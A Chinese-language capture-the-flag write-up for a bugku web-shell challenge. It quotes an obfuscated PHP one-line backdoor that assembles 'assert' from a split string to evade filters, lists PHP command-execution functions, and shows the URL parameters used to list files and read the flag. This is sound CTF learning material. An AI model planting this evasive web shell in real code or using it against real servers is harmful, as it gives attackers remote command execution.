bugku-web-shell

打开环境

什么都没有

提示:

送给大家一个过狗一句话

$poc="a#s#s#e#r#t";

poc_1=explode("#",poc);

poc_2=poc_1[0].poc_1\[1\].poc_1[2].poc_1\[3\].poc_1[4].poc_1\[5\]; poc_2($_GET['s'])

explode():把字符串打散为数组(php内置函数

$poc_2 = 'assert';

php特性:变量名 加 括号()=当函数来执行

$poc_2 = "assert";

$poc_2( 内容 ); → 等价于 assert( 内容 );

最常见的「后门函数」

PHP 里专门执行系统命令的函数

  • assert()
  • eval()
  • system()
  • exec()
  • shell_exec()
  • passthru()
  • include / require
  • system()
  • exec()
  • shell_exec()

url?s=system('ls')

如果是windows服务器要用dir

url?s=system('cat flaga15808abee46a1d5.txt')

相关推荐
茫忙然6 小时前
kali渗透测试与CTF常用命令大全
渗透测试·ctf
白帽子黑客-宝哥1 天前
网络安全有哪些赛事
web安全·网络安全·ctf·漏洞挖掘·网络安全大赛
说实话起个名字真难啊3 天前
2026数字中国创新大赛初赛wp之图片隐写一
ctf
蒲公英eric5 天前
CTFshow misc入门misc8
ctf·misc·图片隐写·ctfshow·图片隐藏
其实防守也摸鱼7 天前
集成开发环境phpStudy安装与配置指南(包含DVWA)
网络·安全·php·web·ctf·工具配置
其实防守也摸鱼8 天前
ctfshow--VIP题目限免(包含原理和知识拓展)前10个
网络·算法·安全·学习笔记·ctf·泄露·web类型
Pure_White_Sword8 天前
[NSSRound#6 Team]void(V1)
网络安全·ctf·reverse·逆向工程
mooyuan天天9 天前
AI大模型辅助Web渗透测试-TRAE智能体自动化解CTF题(命令执行 powershell)
人工智能·web安全·渗透测试·ctf·ai辅助渗透测试
Pure_White_Sword13 天前
[广东省大学生攻防大赛 2022]pyre
网络安全·ctf·reverse·逆向工程
泷羽Sec-静安13 天前
AICTFer一天速成指南
python·sql·ctf